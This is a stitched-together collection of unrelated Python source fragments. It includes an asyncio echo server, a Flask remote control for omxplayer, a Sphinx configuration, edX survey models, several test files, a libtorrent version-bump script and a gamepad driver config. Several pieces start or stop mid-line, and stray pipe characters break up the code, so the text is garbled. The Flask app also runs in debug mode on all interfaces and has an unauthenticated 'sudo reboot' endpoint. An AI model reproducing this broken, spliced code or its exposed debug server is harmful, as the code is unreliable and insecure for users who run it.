peername = writer.get_extra_info('peername')
logging.info('Accepted connection from {}'.format(peername))
while not reader.at_eof():
try:
data = yield from asyncio.wait_for(reader.readline(), timeout=10.0)
writer.write(data)
except concurrent.futures.TimeoutError:
break
writer.close()
if __name__ == '__main__ | ':
logging.basicConfig(level=logging.DEBUG)
server = EchoServer('127.0.0.1', 8899)
try:
server.start()
except KeyboardInterrupt:
pass # Press Ctrl+C to stop
finally:
server.stop() |
import numpy as np
import numpy.testing as npt
import AFQ.utils.parallel as para
def power_it(num, n=2):
# We define a function of the right form for parallelization
return num ** n
def test_parfor():
my_array = np.arange(100).reshape(10, 10)
i, j = np.random.randint(0, 9, 2)
my_list = list(my_array.ravel())
for engine in ["joblib", "dask", "serial"]:
for backend in ["threading", "multiprocessing"]:
| npt.assert_equal(para.parfor(power_it,
my_list,
engine=engine,
backend=backend,
out_shape=my_array.shape)[i, j],
power_it(my_array[i, j]))
# If it's not reshaped, | the first item should be the item 0, 0:
npt.assert_equal(para.parfor(power_it,
my_list,
engine=engine,
backend=backend)[0],
power_it(my_array[0, 0]))
|
#!/usr/bin/env python3.4
# dotslash for local
from flask import Flask, render_template, request, redirect
from werkzeug.contrib.fixers import ProxyFix
from urllib.request import urlopen, Request
from urllib.parse import urlparse
from omxplayer import OMXPlayer
from youtube_dl import YoutubeDL
from youtube_dl.utils import DownloadError
from livestreamer import Livestreamer, PluginError
import os
import traceback
import re
import json
app = Flask(__name__)
app.wsgi_app = ProxyFix(app.wsgi_app)
player = None
title = None
last_logged_message = ""
# this regex is to escape terminal color codes.
_ANSI_ESCAPE_REXP = re.compile(r"\x1b[^m]*m")
@app.route('/about/')
def splash():
return render_template('splash.html')
@app.route('/')
def root(): # redirect to remote for now, might change.
return redirect('/remote')
@app.route('/remote/')
def remote():
return render_template('remote.html')
@app.route('/settings/')
def settings():
return render_template('settings.html')
@app.route('/remote/omxplayer/<command>') # sending keys from the remote
def omxplayer_remote(command):
player = get_player()
if player is not None:
getattr(player, command)()
return '', 204
else:
return 'nothing playing', 400
@app.route('/remote/system/<command>')
def system_remote(command):
if command == "reboot":
log('rebooting!')
os.system("sudo reboot")
else:
return 'bad command', 400
return '', 204 # success!
@app.route('/status/')
def status():
player = get_player()
if player is not None:
dictionary = {
'video_loaded': True,
'paused': player.paused,
'now_playing': title
}
else:
dictionary = {'video_loaded': False}
return json.dumps(dictionary)
@app.route('/play', methods=['GET'])
def play_url(): # this only plays http urls for now, torrents soon.
global title
url = request.args.get('url') # grab url from /play?url=*
if not url.startswith('http'): # in case the user forgot it
log('url missing http/wrong protocol')
url = 'http://' + url # let's assume it's http, not https
log('received url %s' % url)
log('requesting headers from %s...' % url)
req = Request(url)
req.get_method = lambda: 'HEAD' # only request headers, no content
response = urlopen(req)
ctype = response.headers['content-type']
ctype_split = ctype.split('/') # split into 2 parts
log('headers received. content type is %s' % ctype)
try:
if ctype_split[0] == 'audio' or ctype_split[0] == 'video':
log('url was raw media file, playing! :)')
title = url # i guess this works? :T
play_omxplayer(url)
elif ctype_split[1] == 'x-bittorrent':
log('loading torrents not implemented.')
# this isn't implemented yet.
elif ctype_split[0] == 'text':
# here we check if it's a livestream, and if so get the RTMP url
log('checking if url is a livestream...')
live = Livestreamer()
try:
if "youtube" in url:
raise RuntimeError("youtube is fucked up w/ streaming, falling back to youtube-dl")
plugin = live.resolve_url(url)
streams = plugin.get_streams()
stream = streams.get("best") # fingers cros | sed for best quality
stream_url_types = ['rtmp', 'url'] # things that livestreamer can have :D
for stream_type in stream_url_types:
if hasattr(stream, stream_type):
log(' | url is livestream!')
title = "%s (livestream)" % url
play_omxplayer(getattr(stream, stream_type))
return '', 204
except (PluginError, RuntimeError) as e: # therefore url is not (supported) livestream
pass # continue and let youtube-dl try.
log('loading youtube-dl for further processing')
ydl = YoutubeDL({'outtmpl': '%(id)s%(ext)s', 'restrictfilenames': True})
ydl.add_default_info_extractors()
result = ydl.extract_info(url, download=False)
if 'entries' in result: # if video is a playlist
video = result['entries'][0] # play the 1st video in the playlist
else:
video = result
play_omxplayer(video['url'])
title = video['title']
else:
raise DownloadError('Invalid filetype: not audio, video, or text.')
return '', 204 # success w/ no response!
except (UnicodeDecodeError, DownloadError) as e:
return _ANSI_ESCAPE_REXP.sub('', str(e)), 400 # send error message
@app.route("/log/")
def gen_log():
return get_last_logged_message()
def play_omxplayer(uri):
log('playing %s in omxplayer...' % uri)
global player
if get_player() is not None:
player.stop()
player = OMXPlayer(uri,
args='-b -r --audio_queue=10 --video_queue=40',
start_playback=True)
def log(text):
print("[sparky] %s" % text)
global last_logged_message
last_logged_message = text
def get_last_logged_message():
global last_logged_message
return last_logged_message
def get_player():
global player
if player is not None and player.has_finished():
player = None
title = None
return player
if __name__ == '__main__':
app.run("0.0.0.0", debug=True)
|
from axiom.test.historic.stubloader import StubbedTest
from xquotient.mail import MailTransferAgent
from axiom.userbase import LoginSystem
class MTAUpgraderTest(StubbedTest):
def testMTA2to3(self):
"""
Make sure MailTransferAgent upgraded OK and that its
"userbase" attribute refers to the store's userbase.
"""
mta = self.store.findUnique(MailTransferAgent)
self.assertIdentical(mta.userbase,
self.store.findUnique(Lo | ginSystem))
| |
at not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
sys.path.append(os.path.abspath('_themes'))
sys.path.append(os.path.abspath('.'))
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
needs_sphinx = '1.1'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.doctest', 'sphinx.ext.todo',
'sphinx.ext.coverage', 'sphinx.ext.ifconfig', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Gateway'
copyright = u'2012, Stephane Wirtel'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
import pkg_resources
try:
release = pkg_resources.get_distribution('gateway').version
except pkg_resources.DistributionNotFound:
print 'To build the documentation, The distribution information of Gateway'
print 'Has to be available. Either install the package into your'
print 'development environment or run "setup.py develop" to setup the'
print 'metadata. A virtualenv is recommended!'
sys.exit(1)
del pkg_resources
if 'dev' in release:
release = release.split('dev')[0] + 'dev'
version = '.'.join(release.split('.')[:2])
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
#pygments_style = 'sphinx'
pygments_style = 'flask_theme_support.FlaskyStyle'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'flask'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ['_themes']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each let | ter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be outpu | t, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'Gatewaydoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
'fontpkg' : r'\usepackage{mathpazo}',
'papersize' : 'a4paper',
'pointsize' : '12pt',
'preamble' : r' \usepackage{flaskstyle}',
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'Gateway.tex', u'Gateway Documentation',
u'Stephane Wirtel', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
latex_use_parts = True
latex_use_modindex = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
latex_additional_files = [
'flaskstyle.sty',
]
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'gateway', u'Gateway Documentation',
[u'Stephane Wirtel'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
|
# force floating point division. Can still use integer with //
from __future__ import division
# This file is used for importing the common utilities classes.
import numpy as np
import matplotlib.pyplot as plt
import sys
sys.path.append("../../../../")
import BellZhurkov.Python.TestExamples.TestUtil.Bell_Test_Data as Data
import BellZhurkov.Python.Code.BellZhurkov as BellModel
def RunWoodsideFigure6():
"""
Reproduces Figure 6 From:
Woodside, Michael T., and Steven M. Block.
"Reconstructing Folding Energy Landscapes by Single-Molecule Force Spectroscopy"
Annual Review of Biophysics 43, no. 1 (2014): 19-39.
doi:10.1146/annurev-biophys-051013-022754.
See TestExamples.TestUtil.Bell_Test_Data.Woodside2014FoldingAndUnfoldingData
"""
BellData = Data.Woodside2014FoldingAndUnfoldingData()
Forces,Folding,Unfolding = (BellData.Forces,BellData.RatesFold,
BellData.RatesUnfold)
# everything in SI initially
vary = dict(beta=False,
k0=False,
DeltaG=True,
DeltaX=True)
GuessDict = dict(beta=1/(4.1e-21),
k0=1,
DeltaX=20e-9,
DeltaG=0)
opt = dict(Values=GuessDict,
Vary=vary)
infFold = BellModel.Bel | lZurkovFit(Forces,Folding,**opt)
infUnfold = BellModel.BellZurkovFit(Forces,Unfolding,**opt)
# get predictions along a (slightly l | arger) x range
xMin=11e-12
xMax=15e-12
# how much should we interpolate?
numPredict = (len(Forces)+1)*50
xRangePredict = np.linspace(xMin,xMax,numPredict)
predictFold = infFold.Predict(xRangePredict)
predictUnfold = infUnfold.Predict(xRangePredict)
markerDict = dict(marker='o',
markersize=7,
linewidth=0,
markeredgewidth=0.0)
lineDict = dict(linestyle='-',color='k',linewidth=1.5)
toPn = 1e12
ForcePn = Forces*toPn
fig = plt.figure()
ax = plt.subplot(1,1,1)
plt.plot(ForcePn,Folding,'ro',label="Folding",**markerDict)
plt.plot(xRangePredict*toPn,predictFold,**lineDict)
plt.plot(ForcePn,Unfolding,'bo',label="Unfolding",**markerDict)
plt.plot(xRangePredict*toPn,predictUnfold,**lineDict)
ax.set_yscale('log')
# limits in PicoNewtons
plt.xlim(xMin*toPn,xMax*toPn)
plt.xlabel("Force (pN)")
plt.ylabel("Rate (Hz)")
plt.title("Woodside and Block, Figure 6a (2016)")
plt.legend(loc='lower center')
fig.savefig("./Woodside2016_Figure6.png")
def RunSchlierf2006Figure1a():
DataToTest = Data.Schlierf2006Figure1a()
Forces,Folding = (DataToTest.Forces,DataToTest.RatesFold)
# everything in SI initially
vary = dict(beta=False,
k0=True,
DeltaG=False,
DeltaX=True)
GuessDict = dict(beta=1/(4.1e-21),
k0=0.35,
DeltaX=5e-10,
DeltaG=0)
opt = dict(Values=GuessDict,
Vary=vary)
infFold = BellModel.BellZurkovFit(Forces,Folding,**opt)
def run():
"""
Runs examples of the Bell-Zhurkov Model
"""
RunSchlierf2006Figure1a()
RunWoodsideFigure6()
if __name__ == "__main__":
run()
|
ort Course Surveys feature
"""
import logging
from lxml import etree
from collections import OrderedDict
from django.db import models
from student.models import User
from django.core.exceptions import ValidationError
from model_utils.models import TimeStampedModel
from survey.exceptions import SurveyFormNameAlreadyExists, SurveyFormNotFound
from xmodule_django.models import CourseKeyField
log = logging.getLogger("edx.survey")
class SurveyForm(TimeStampedModel):
"""
Model to define a Survey Form that contains the HTML form data
that is presented to the end user. A SurveyForm is not tied to
a particular run of a course, to allow for sharing of Surveys
across courses
"""
name = models.CharField(max_length=255, db_index=True, unique=True)
form = models.TextField()
def __unicode__(self):
return self.name
def save(self, *args, **kwargs):
"""
Override save method so we can validate that the form HTML is
actually parseable
"""
self.validate_form_html(self.form)
# now call the actual save method
super(SurveyForm, self).save(*args, **kwargs)
@classmethod
def validate_form_html(cls, html):
"""
Makes sure that the html that is contained in the form field is valid
"""
try:
fields = cls.get_field_names_from_html(html)
except Exception as ex:
log.exception("Cannot parse SurveyForm html: {}".format(ex))
raise ValidationError("Cannot parse SurveyForm as HTML: {}".format(ex))
if not len(fields):
raise ValidationError("SurveyForms must contain at least one form input field")
@classmethod
def create(cls, name, form, update_if_exists=False):
"""
Helper class method to create a new Survey Form.
update_if_exists=True means that if a form already exists with that name, then update it.
Otherwise throw an SurveyFormAlreadyExists exception
"""
survey = cls.get(name, throw_if_not_found=False)
if not survey:
survey = SurveyForm(name=name, form=form)
else:
if update_if_exists:
survey.form = form
else:
raise SurveyFormNameAlreadyExists()
survey.save()
return survey
@classmethod
def get(cls, name, throw_if_not_found=True):
"""
Helper class method to look up a Survey Form, throw FormItemNotFound if it does not exists
in the database, unless throw_if_not_found=False then we return None
"""
survey = None
exists = SurveyForm.objects.filter(name=name).exists()
if exists:
survey = SurveyForm.objects.get(name=name)
elif throw_if_not_found:
raise SurveyFormNotFound()
return survey
def get_answers(self, user=None, limit_num_users=10000):
"""
Returns all answers for all users for this Survey
"""
return SurveyAnswer.get_answers(self, user, limit_num_users=limit_num_users)
def has_user_answered_survey(self, user):
"""
Returns whether a given user has supplied answers to this
survey
"""
return SurveyAnswer.do_survey_answers_exist(self, user)
def save_user_answers(self, user, answers, course_key):
"""
Store answers to the form for a given user. Answers is a dict of simple
name/value pairs
IMPORTANT: There is no validaton of form answers at this point. All data
supplied to this method is presumed to be previously validated
"""
# first remove any answer the user might have done before
self.clear_user_answers(user)
SurveyAnswer.save_answers(self, user, answers, course_key)
def clear_user_answers(self, user):
"""
Removes all answers that a user has submitted
"""
SurveyAnswer.objects.filter(form=self, user=user).delete()
def get_field_names(self):
"""
Returns a list of defined field names for all answers in a survey. This can be
helpful for reporting like features, i.e. adding headers to the reports
This is taken from the set of <input> fields inside the form.
"""
return SurveyForm.get_field_names_from_html(self.form)
@classmethod
def get_field_names_from_html(cls, html):
"""
Returns a list of defined field names from a block of HTML
"""
names = []
# make sure the form is wrap in some outer single element
# otherwise lxml can't parse it
# NOTE: This wrapping doesn't change the ability to query it
tree = etree.fromstring(u'<div>{}</div>'.format(html))
input_fields = (
tree.findall('.//input') + tree.findall('.//select') +
tree.findall('.//textarea')
)
for input_field in input_fields:
if 'name' in input_field.keys() and input_field.attrib['name'] not in names:
names.append(input_field.attrib['name'])
return names
class SurveyAnswer(TimeStampedModel):
"""
Model for the answers that a user gives for a particular form in a course
"""
user = models.ForeignKey(User, db_index=True)
form = models.ForeignKey(SurveyForm, db_index=True)
field_name = models.CharField(max_length=255, db_index=True)
field_value = models.CharField(max_length=1024)
# adding the course_id where the end-user answered the survey question
# since it didn't exist in the beginning, it is nullable
course_key = CourseKeyField(max_length=255, db_index=True, null=True)
@classmethod
def do_survey_answers_exist(cls, form, user):
"""
Returns whether a user has any answers for a given SurveyForm for a course
This can be used to determine if a user has taken a CourseSurvey.
"""
return SurveyAnswer.objects.filter(form=form, user=user).exists()
@classmethod
def get_answers(cls, form, user=None, limit_num_users=10000):
"""
Returns all answers a user (or all users, when user=None) has given to an instance of a SurveyForm
Return is a nested dict which are simple name/value pairs with an outer key which is the
user id. For example (where 'field3' i | s an optional field):
results = {
'1': {
'field1': 'value1',
'field2': 'value2',
},
'2': {
'field1': 'value3',
'field2': 'value4',
'field3': 'value5',
}
:
:
}
limit_num_users is to prevent an unintentional huge, | in-memory dictionary.
"""
if user:
answers = SurveyAnswer.objects.filter(form=form, user=user)
else:
answers = SurveyAnswer.objects.filter(form=form)
results = OrderedDict()
num_users = 0
for answer in answers:
user_id = answer.user.id
if user_id not in results and num_users < limit_num_users:
results[user_id] = OrderedDict()
num_users = num_users + 1
if user_id in results:
results[user_id][answer.field_name] = answer.field_value
return results
@classmethod
def save_answers(cls, form, user, answers, course_key):
"""
Store answers to the form for a given user. Answers is a dict of simple
name/value pairs
IMPORTANT: There is no validaton of form answers at this point. All data
supplied to this method is presumed to be previously validated
"""
for name in answers.keys():
value = answers[name]
# See if there is an answer stored for this user, form, field_name pair or not
# this will allow for update cases. This does include an additional lookup,
# but write operations will be relatively infrequent
value = answers[name]
defaults = {"field_value": value}
if course_key:
|
import sys
try:
import setuptools
f | rom setuptools import setup
except ImportError:
setuptools = None
from distutils.core import setup
version = '0.0.1'
kwargs = {}
if setuptools is not None:
kwargs['install_requires'] = ['tornado>=4.3']
if sys.version_info < (3, 4):
kwargs['install_requires'].append('enum34')
setup(
name='tornado_http2',
version=version,
packages=['tornado_http2', 'tornad | o_http2.test'],
package_data={
'tornado_http2': [
'hpack_static_table.txt',
'hpack_huffman_data.txt',
],
'tornado_http2.test': [
'test.crt',
'test.key',
],
},
**kwargs)
|
import io
import os
import unittest
from stango import Stango
from stango.files import Files
from . import StangoTestCase, make_suite, view_value, view_template
dummy_view = view_value('')
class GenerateTestCase(StangoTestCase):
def setup(self):
self.tmp = self.tempdir()
self.manager = Stango()
self.manager.index_file = 'index.html'
def test_generate_simple(self):
self.manager.files += [
('', view_value('foobar')),
('barfile.txt', view_value('barfoo')),
]
self.manager.generate(self.tmp)
self.eq(sorted(os.listdir(self.tmp)), ['barfile.txt', 'index.html'])
with open(os.path.join(self.tmp, 'index.html')) as fobj:
self.eq(fobj.read(), 'foobar')
with open(os.path.join(self.tmp, 'barfile.txt')) as fobj:
self.eq(fobj.read(), 'barfoo')
def test_generate_dest_is_non_dir(self):
self.manager.files = Files(
('', dummy_view),
)
dest_path = os.path.join(self.tmp, 'dest.txt')
with open(dest_path, 'w') as fobj:
fobj.write('foo')
exc = self.assert_raises(ValueError, self.manager.generate, dest_path)
self.eq(str(exc), "'%s' is not a directory" % dest_path)
# Check the file wasn't modified
self.eq(os.listdir(self.tmp), ['dest.txt'])
with open(os.path.join(self.tmp, 'dest.txt'), 'r') as fobj:
self.eq(fobj.read(), 'foo')
def test_generate_outdir_exists(self):
# Create a file and a directory to outdir
with open(os.path.join(self.tmp, 'foo'), 'w') as fobj:
fobj.write('bar')
os.mkdir(os.path.join(self.tmp, 'dummydir'))
self.eq(sorted(os.listdir(self.tmp)), ['dummydir', 'foo'])
self.manager.files = Files(
('', view_value('baz')),
)
self.manager.generate(self.tmp)
# Check that the old destdir contents were removed
self.eq(os.listdir(self.tmp), ['index.html'])
def test_generate_different_index_file(self):
self.manager.index_file = 'foofile.txt'
self.manager.files += [
('', view_value('foobar')),
('barfile.txt', view_value('barfoo')),
]
self.manager.generate(self.tmp)
self.eq(sorted(os.listdir(self.tmp)), ['barfile.txt', 'foofile.txt'])
with open(os.path.join(self.tmp, 'foofile.txt')) as fobj:
self.eq(fobj.read(), 'foobar')
with open(os.path.join(self.tmp, 'barfile.txt')) as fobj:
self.eq(fobj.read(), 'barfoo')
def test_view_returns_a_bytes_object(self):
self.manager.files = Files(
('', view_value(b'\xde\xad\xbe\xef')),
)
self.manager.generate(self.tmp)
self.eq(os.listdir(se | lf.tmp), ['index.html'])
with open(os.path.join(self.tmp, 'index.html'), 'rb') as fobj:
self.eq(fobj.read(), b'\xde\xad\xbe\xef')
def test_view_returns_a_bytearray_object(self):
self.manager.files = Files(
('', view_value(bytearray(b'\xba\xdc\x0f\xfe'))),
)
self.manager.generate(self.tmp)
self.eq(os.listdir(self.tmp), ['index.html'])
wi | th open(os.path.join(self.tmp, 'index.html'), 'rb') as fobj:
self.eq(fobj.read(), b'\xba\xdc\x0f\xfe')
def test_view_returns_a_filelike_object_with_str_contents(self):
self.manager.files = Files(
('', view_value(io.StringIO('foobar'))),
)
self.manager.generate(self.tmp)
self.eq(os.listdir(self.tmp), ['index.html'])
with open(os.path.join(self.tmp, 'index.html'), 'r') as fobj:
self.eq(fobj.read(), 'foobar')
def test_view_returns_a_filelike_object_with_bytes_contents(self):
self.manager.files = Files(
('', view_value(io.BytesIO(b'barfoo'))),
)
self.manager.generate(self.tmp)
self.eq(os.listdir(self.tmp), ['index.html'])
with open(os.path.join(self.tmp, 'index.html'), 'r') as fobj:
self.eq(fobj.read(), 'barfoo')
def test_view_renders_a_template(self):
self.manager.template_dirs.insert(0, self.template_path)
self.manager.files = Files(
('', view_template('value.txt'), {'value': 'foobar'})
)
self.manager.generate(self.tmp)
self.eq(os.listdir(self.tmp), ['index.html'])
with open(os.path.join(self.tmp, 'index.html')) as fobj:
self.eq(fobj.read(), 'value is: foobar')
def test_no_index_file(self):
self.manager.index_file = None
self.manager.files = Files(
('quux/', dummy_view),
)
exc = self.assert_raises(ValueError, self.manager.generate, self.tmp)
self.eq(str(exc), "Directory path and no index_file: 'quux/'")
def test_view_returns_None(self):
self.manager.files = Files(
('', view_value(None)),
)
exc = self.assert_raises(ValueError, self.manager.generate, self.tmp)
self.eq(str(exc), "The result of view 'value_returner' for path '' is not a str, bytes or bytearray instance or a file-like object")
def test_view_returns_an_integer(self):
self.manager.files = Files(
('foo.txt', view_value(1)),
)
exc = self.assert_raises(ValueError, self.manager.generate, self.tmp)
self.eq(str(exc), "The result of view 'value_returner' for path 'foo.txt' is not a str, bytes or bytearray instance or a file-like object")
def test_view_returns_a_filelike_object_with_invalid_contents(self):
class InvalidFile(object):
def read(self):
return 42
self.manager.files = Files(
('', view_value(InvalidFile())),
)
exc = self.assert_raises(ValueError, self.manager.generate, self.tmp)
self.eq(str(exc), "Contents of the file-like object, returned by view 'value_returner' for path '', is not a str, bytes or bytearray instance")
def test_post_render_hook(self):
def post_render_hook(context, data):
return data + b' hurr durr'
self.manager.add_hook('post_render_hook', post_render_hook)
self.manager.files = Files(
('', view_value('foobar')),
)
self.manager.generate(self.tmp)
self.eq(os.listdir(self.tmp), ['index.html'])
with open(os.path.join(self.tmp, 'index.html'), 'rb') as fobj:
self.eq(fobj.read(), b'foobar hurr durr')
def test_post_render_hook_returns_None(self):
self.manager.add_hook('post_render_hook', lambda x, y: None)
self.manager.files = Files(
('', view_value('foobar')),
)
exc = self.assert_raises(ValueError, self.manager.generate, self.tmp)
self.eq(str(exc), 'The result of post_render_hook is not a bytes or bytearray instance for index.html')
def suite():
return make_suite(GenerateTestCase)
|
"""
This module contains transfor | mation functio | ns (clip->clip)
One file for one fx. The file's name is the fx's name
"""
|
#! /usr/bin/env python
import os
import sys
import glob
version = (int(sys.argv[1]), int(sys.argv[2]), int(sys.argv[3]), int(sys.argv[4]))
def substitute_file(name):
subst = ''
f = open(name)
for l in f:
if '#define LIBTORRENT_VERSION_MAJOR' in l and name.endswith('.hpp'):
l = '#define LIBTORRENT_VERSION_MAJOR %d\n' % version[0]
elif '#define LIBTORRENT_VERSION_MINOR' in l and name.endswith('.hpp'):
l = '#define LIBTORRENT_VERSION_MINOR %d\n' % version[1]
elif '#define LIBTORRENT_VERSION_TI | NY' in l and name.endswith('.hpp'):
l = '#define LIBTORRENT_VERSION_TINY %d\n' % version[2]
elif '#define LIBTORRENT_VERSION ' in l and name.endswith('.hpp'):
l = '#define LIBTORRENT_VERSION "%d.%d.%d.%d"\n' % | (version[0], version[1], version[2], version[3])
elif 'AC_INIT([libtorrent-rasterbar]' in l and name.endswith('.ac'):
l = 'AC_INIT([libtorrent-rasterbar],[%d.%d.%d],[arvid@libtorrent.org],\n' % (version[0], version[1], version[2])
elif 'set (VERSION ' in l and name.endswith('.txt'):
l = 'set (VERSION "%d.%d.%d")\n' % (version[0], version[1], version[2])
elif ':Version: ' in l and (name.endswith('.rst') or name.endswith('.py')):
l = ':Version: %d.%d.%d\n' % (version[0], version[1], version[2])
elif 'VERSION = ' in l and name.endswith('Jamfile'):
l = 'VERSION = %d.%d.%d ;\n' % (version[0], version[1], version[2])
elif 'version=' in l and name.endswith('setup.py'):
l = "\tversion = '%d.%d.%d',\n" % (version[0], version[1], version[2])
elif "version = '" in l and name.endswith('setup.py'):
l = "\tversion = '%d.%d.%d',\n" % (version[0], version[1], version[2])
subst += l
f.close()
open(name, 'w+').write(subst)
substitute_file('include/libtorrent/version.hpp')
substitute_file('CMakeLists.txt')
substitute_file('configure.ac')
substitute_file('bindings/python/setup.py')
substitute_file('docs/gen_reference_doc.py')
for i in glob.glob('docs/*.rst'):
substitute_file(i)
substitute_file('Jamfile')
|
print "Loading USBDriver : Logitech Cordless RumblePad 2"
class USBDriver :
def __init__(self):
self.componentNextThrottleFrame = "Hat Switch" # Component for throttle frames browsing
self.valueNextThrottleFrame = 0.5
self.componentPreviousThrottleFrame = "Hat Switch"
self.valuePreviousThrottleFrame = 1
self.componentNextRunningThrottleFrame = "" # Component for running throttle frames browsing
self.valueNextRunningThrottleFrame = 0.75
self.componentPreviousRunningThrottleFrame = ""
self.valuePreviousRunningThrottleFrame = 0.25
# From there available only when no throttle is active in current window
self.componentNextRosterBrowse = "Hat Switch" # Component for roster browsing
self.valueNextRoster = 0.75
self.componentPreviousRosterBrowse = "Hat Switch"
self.valuePreviousRoster = 0.25
self.componentRosterSelect = "Button 4" # Component to select a roster
self.valueRosterSelect = 1
# From there available only when a throttle is active in current window
self.componentThrottleRelease = "Button 5" # Component to release current throttle
self.valueThrottleRelease = 1
self.componentSpeed = "X Axis" # Analog axis component for curent throttle speed
self.valueSpeedTrigger = 0.05 # ignore values lower than
self.componentSpeedMultiplier = .5 # multiplier for pad value (negative values to reveerse)
self.componentSpeedIncrease = ""
self.valueSpeedIncrease = 1
self.componentSpeedDecrease = ""
self.valueSpeedDecrease = 1
self.componentDirectionForward = "Z Rotation" # Analog axis component for curent throttle direction
self.valueDirectionForward = -1
self.componentDirectionBackward = "Z Rotation"
self.valueDirectionBackward = 1
self.componentStopSpeed = "Button 7" # Preset speed button stop, double tap will Estop
self.valueStopSpeed = 1
self.componentSlowSpeed = "" # Preset speed button slow
self.valueSlowSpeed = 1
self.componentCruiseSpeed = "" # Preset speed button cruise, double tap will max speed
self.valueCruiseSpeed = 1
self.componentMaxSpeed = "" # Preset speed button max
self.valueMaxSpeed = 1
self.componentF0 = "Button 0" # Function button
self.valueF0 = 1
self.valueF0Off = 0 # off event for non lockable fun | ction | s
self.componentF1 = "Button 1" # Function button
self.valueF1 = 1
self.valueF1Off = 0
self.componentF2 = "Button 2" # Function button
self.valueF2 = 1
self.valueF2Off = 0
self.componentF3 = "Button 3" # Function button
self.valueF3 = 1
self.valueF3Off = 0
self.componentF4 = "" # Function button
self.valueF4 = 1
self.valueF4Off = 0
self.componentF5 = "" # Function button
self.valueF5 = 1
self.valueF5Off = 0
self.componentF6 = "" # Function button
self.valueF6 = 1
self.valueF6Off = 0
self.componentF7 = "" # Function button
self.valueF7 = 1
self.valueF7Off = 0
self.componentF8 = "" # Function button
self.valueF8 = 1
self.valueF8Off = 0
self.componentF9 = "" # Function button
self.valueF9 = 1
self.valueF9Off = 0
self.componentF10 = "" # Function button
self.valueF10 = 1
self.valueF10Off = 0
self.componentF11 = "" # Function button
self.valueF11 = 1
self.valueF11Off = 0
self.componentF12 = "" # Function button
self.valueF12 = 1
self.valueF12Off = 0
self.componentF13 = "" # Function button
self.valueF13 = 1
self.valueF13Off = 0
self.componentF14 = "" # Function button
self.valueF14 = 1
self.valueF14Off = 0
self.componentF15 = "" # Function button
